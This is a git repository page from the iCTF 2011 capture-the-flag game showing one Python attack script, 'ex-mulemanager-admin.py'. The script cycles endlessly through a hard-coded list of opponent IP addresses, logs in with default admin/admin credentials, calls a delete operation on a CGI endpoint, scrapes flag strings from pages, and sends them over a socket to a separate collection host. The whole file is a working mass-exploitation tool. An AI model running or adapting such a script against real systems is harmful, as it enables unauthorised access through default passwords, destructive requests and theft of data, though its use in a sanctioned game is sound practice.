ctf-2011

old assets from capture-the-flag ictf 2011

git clone https://9o.is/git/ctf-2011.git

ex-mulemanager-admin.py

(3092B)

      1 #!/usr/bin/env python
      2 import socket
      3 import re
      4 import mechanize
      5 import urllib2
      6 import httplib
      7 
      8 def do(host):
      9     try:
     10         br = mechanize.Browser()
     11         br.open("http://"+host+"/login.php", timeout=3.0)
     12         
     13         try:
     14             br.select_form(nr=0)
     15         except:
     16             print 'Did not find form'
     17             return ''
     18     
     19         br.form['username'] = 'admin'
     20         br.form['password'] = 'admin'
     21         br.submit()
     22     
     23         if 'ERROR: Invalid username and/or password.' in br.response().read():
     24             # does not work here
     25             print 'Default admin login does not work'
     26             return ''
     27     
     28         print 'Default admin login worked'
     29     
     30         br.open("http://"+host+'/~muleadmin/cgi-bin/groups?operation=delete', timeout=5.0)
     31         r = br.response().read()
     32     
     33         if 'flg' in r:
     34             return r
     35     
     36         return ''
     37     except urllib2.URLError:
     38         return ''
     39     except httplib.BadStatusLine:
     40         return ''
     41 
     42 def do_more(host):
     43     try:
     44         br = mechanize.Browser()
     45         br.open("http://"+host+"/test.php", timeout=3.0)
     46         r = br.response().read()
     47         
     48         if 'flg' in r:
     49             print 'test.php had flags'
     50             return r
     51 
     52         return ''
     53     except urllib2.URLError:
     54         return ''
     55     except httplib.BadStatusLine:
     56         return ''
     57 
     58 while True:
     59     for host in ['10.13.136.3', '10.13.145.3', '10.13.188.3', '10.13.179.3', '10.13.157.3', '10.13.155.3', '10.13.190.3', '10.13.148.3', '10.13.208.3', '10.13.213.3', '10.13.165.3', '10.13.176.3', '10.13.211.3', '10.13.194.3', '10.13.185.3', '10.13.196.3', '10.13.129.3', '10.13.215.3', '10.13.146.3', '10.13.151.3', '10.13.202.3', '10.13.139.3', '10.13.174.3', '10.13.142.3', '10.13.198.3', '10.13.181.3', '10.13.206.3', '10.13.150.3', '10.13.168.3', '10.13.184.3', '10.13.169.3', '10.13.199.3', '10.13.135.3', '10.13.141.3', '10.13.177.3', '10.13.153.3', '10.13.187.3', '10.13.138.3', '10.13.152.3', '10.13.166.3', '10.13.143.3', '10.13.134.3', '10.13.163.3', '10.13.205.3', '10.13.186.3', '10.13.156.3', '10.13.180.3', '10.13.133.3', '10.13.193.3', '10.13.195.3', '10.13.154.3', '10.13.200.3', '10.13.175.3', '10.13.131.3', '10.13.170.3', '10.13.167.3', '10.13.162.3', '10.13.173.3', '10.13.212.3', '10.13.207.3', '10.13.171.3', '10.13.164.3', '10.13.140.3', '10.13.214.3', '10.13.191.3', '10.13.161.3', '10.13.192.3', '10.13.178.3', '10.13.137.3', '10.13.210.3', '10.13.159.3', '10.13.158.3', '10.13.189.3', '10.13.172.3', '10.13.182.3', '10.13.149.3', '10.13.130.3', '10.13.183.3', '10.13.203.3', '10.13.147.3', '10.13.160.3', '10.13.204.3', '10.13.144.3', '10.13.197.3', '10.13.132.3', '10.13.209.3', '10.13.201.3']:
     60         print 'trying',host
     61         flags = do(host)
     62         flags += do_more(host)
     63         
     64         if flags:
     65             print 'sending flags...'
     66             s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
     67             s.connect(('10.13.147.24', 2324))
     68             s.send(host+'\n')
     69             s.send('mulemanager\n')
     70             s.send(''.join(flags.split('\n'))+'\n')
     71             print s.recv(1024)
     72